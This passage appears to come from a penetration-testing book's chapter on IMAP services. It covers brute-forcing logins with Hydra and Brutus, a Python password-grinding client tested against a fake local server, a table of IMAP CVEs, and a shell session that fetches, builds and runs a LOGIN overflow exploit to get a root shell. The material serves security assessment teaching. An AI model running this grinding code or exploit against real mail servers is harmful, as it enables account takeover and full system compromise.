Internet Message Access Protocol (IMAP) services are commonly found running on TCP port 143 (IMAP over SSL/TLS, IMAPS, uses TCP port 993). From an assessment standpoint IMAP is much like POP-3: a user authenticates with a plaintext network service and can then collect and manage the mail held on the server.
Most accessible IMAP servers on the Internet today run the Washington University IMAP service (known as both UW IMAP and WU-IMAP), distributed from the official UW IMAP site at http://www.washington.edu/imap/. Mark Crispin (http://staff.washington.edu/mrc/) designed IMAP and maintains the UW implementation; the current revision of the protocol is IMAP4rev1, defined in RFC 3501.
As with many other simple plaintext protocols (Telnet, FTP, POP-3, etc.), Hydra (Unix-based) and Brutus (Win32 GUI) do an excellent job of brute-forcing valid user-account passwords. As mentioned earlier, they can be downloaded from:
Like POP-3, IMAP services are notoriously susceptible to brute-force password grinding: most servers enforce no account lockout policy, and many don't log unsuccessful authentication attempts at all. Each failed LOGIN is simply answered with a tagged NO response, so a grinding tool can try candidate after candidate; any limit it meets is usually per connection (a delay, or a disconnect after a few failures), which the tool sidesteps by reconnecting.
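The following is an added example, not code from the book nor from Brutus or Hydra: a minimal IMAP4rev1 LOGIN password-grinding client written against a raw socket, paired with an in-process fake IMAP server so the exchange can be run offline. It shows the exchange a grinding tool relies on (tagged LOGIN commands, userid and password sent as RFC 3501 quoted strings, and the tagged OK/NO/BAD reply that decides whether a candidate worked) and the server behaviour the text describes: no lockout and no logging of failures. The account table, banner and wordlist are constructed test data.

```python
"""IMAP4rev1 LOGIN password grinding over a raw socket, with an in-process fake
IMAP server.  Added example for this page; not code from the book, Brutus or
Hydra.  FAKE_ACCOUNTS, FAKE_BANNER and the wordlist are constructed data."""
import re
import socket
import threading

# Constructed credential store and greeting for the fake server (assumptions).
FAKE_ACCOUNTS = {"alice": "hunter2"}
FAKE_BANNER = b"* OK example.org IMAP4rev1 Service Ready\r\n"

# RFC 3501 astring: either a quoted string (with backslash escapes) or an atom.
ASTRING = re.compile(r'"((?:[^"\\]|\\.)*)"|(\S+)')


def quote(value):
    """Encode a userid/password as a quoted string so spaces and quotes in a
    candidate do not break the LOGIN command syntax."""
    escaped = value.replace("\\", "\\\\").replace('"', '\\"')
    return ('"' + escaped + '"').encode("utf-8")


def parse_astrings(args):
    """Split the argument part of a command into astrings, unescaping quoted ones."""
    return [re.sub(r"\\(.)", r"\1", q) if q else a for q, a in ASTRING.findall(args)]


def fake_imap_server(listener):
    """Serve one client.  Answers LOGIN per RFC 3501 6.2.3 with a tagged OK or
    NO, never locks the account and never records a failure: the weakness the
    surrounding text describes."""
    conn, _ = listener.accept()
    listener.close()
    with conn, conn.makefile("rb") as rf:
        conn.sendall(FAKE_BANNER)
        for raw in rf:
            line = raw.decode("utf-8", "replace").rstrip("\r\n")
            m = re.match(r"^(\S+) (\S+)(?: (.*))?$", line)
            if not m:
                conn.sendall(b"* BAD malformed command\r\n")
                continue
            tag, cmd, args = m.group(1), m.group(2).upper(), m.group(3) or ""
            if cmd == "LOGIN":
                creds = parse_astrings(args)
                if len(creds) == 2 and FAKE_ACCOUNTS.get(creds[0]) == creds[1]:
                    conn.sendall(("%s OK LOGIN completed\r\n" % tag).encode())
                else:
                    conn.sendall(("%s NO LOGIN failed\r\n" % tag).encode())
            elif cmd == "LOGOUT":
                conn.sendall(("* BYE\r\n%s OK LOGOUT completed\r\n" % tag).encode())
                return
            else:
                conn.sendall(("%s BAD unsupported command\r\n" % tag).encode())


def read_tagged_response(rf, tag):
    """Skip untagged ('* ...') lines and return the status word (OK, NO or BAD)
    of the response carrying our tag."""
    while True:
        line = rf.readline()
        if not line:
            raise ConnectionError("server closed the connection")
        if line.startswith(tag + b" "):
            return line.split(b" ", 2)[1].decode("ascii", "replace")


def imap_grind(host, port, user, wordlist):
    """Try each candidate with its own tagged LOGIN on one connection.  Returns
    (banner, password) with password None if the wordlist is exhausted."""
    with socket.create_connection((host, port), timeout=10) as s, s.makefile("rb") as rf:
        banner = rf.readline().decode("ascii", "replace").rstrip("\r\n")
        if not banner.startswith("* OK"):
            raise ConnectionError("unexpected greeting: " + banner)
        for n, candidate in enumerate(wordlist, start=1):
            tag = b"a%04d" % n
            s.sendall(tag + b" LOGIN " + quote(user) + b" " + quote(candidate) + b"\r\n")
            status = read_tagged_response(rf, tag)
            if status == "OK":
                s.sendall(b"a9999 LOGOUT\r\n")  # leave the session cleanly
                return banner, candidate
            if status != "NO":  # BAD means the server rejected our syntax
                raise RuntimeError("server answered %s to LOGIN" % status)
        return banner, None


def run_demo(wordlist, user="alice"):
    """Start the fake server on an ephemeral loopback port and grind against it."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=fake_imap_server, args=(listener,), daemon=True)
    t.start()
    result = imap_grind("127.0.0.1", port, user, wordlist)
    t.join(timeout=5)
    return result


if __name__ == "__main__":
    # Constructed wordlist; the valid password is the last entry.
    print(run_demo(["password", "letmein", "pass word", "hunter2"]))
```

Against a real server the loop should additionally catch ConnectionError and reconnect, since some servers drop the connection after a few failed LOGINs; the protocol itself gives the tool no other signal that it is being throttled, which is exactly why the attack is so effective.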
Since 1997, a handful of remotely exploitable security vulnerabilities within IMAP2bis and IMAP4rev1 services have been publicized, which are summarized in Table 10-5.
| CVE name | Date (dd/mm/yyyy) | Notes |
|---|---|---|
| CVE-1999-0005 | 17/07/1998 | Washington University IMAP 4 (IMAP4rev1 10.234) and prior AUTHENTICATE command overflow |
| CVE-1999-0042 | 02/03/1997 | Washington University IMAP 4.1beta and prior LOGIN command overflow |
| CVE-2000-0233 | 27/03/2000 | SuSE Linux IMAP server allows remote attackers to bypass IMAP authentication and gain privileges |
| CVE-2000-0284 | 16/04/2000 | Washington University IMAP 4.7 (IMAP4rev1 12.264) post-authentication LIST command overflow |
| CVE-2002-0379 | 10/05/2002 | Washington University IMAP 2000c and prior post-authentication BODY command overflow |
The serious unauthenticated vulnerabilities in IMAP services are the two pre-authentication overflows, CVE-1999-0005 and CVE-1999-0042 (CVE-2000-0233 is an authentication bypass specific to the SuSE-packaged server, and the remaining two overflows require a valid account). Exploit scripts for the AUTHENTICATE command overflow are available for multiple platforms (including BSDi, Solaris, and Linux) at:
The second unauthenticated vulnerability is the IMAP LOGIN command overflow, for which a good exploit script is available at http://packetstormsecurity.org/Exploit_Code_Archive/imaps.tar.gz.
After finding the correct offset to use with the exploit script, it is very straightforward to compromise a vulnerable Linux host, as shown in Example 10-11.
```
# wget http://examples.oreilly.com/networksa/tools/imaps.tar.gz
# tar xfz imaps.tar.gz
# cd imaps
# make
cc -O2 -o imaps imaps.c
imaps.c: In function `imap':
imaps.c:35: warning: function returns address of local variable
# ls
hey.sh  imaps*  imaps.c  include/  makefile  other/  readme
# ./imaps 192.168.0.35 100
Connecting to 192.168.0.35 on port 143.
* OK example.org IMAP2bis Service 7.8(92) at Mon, 3 Mar 2003 13:16:02
id;
uid=0(root) gid=0(root) groups=0(root)
```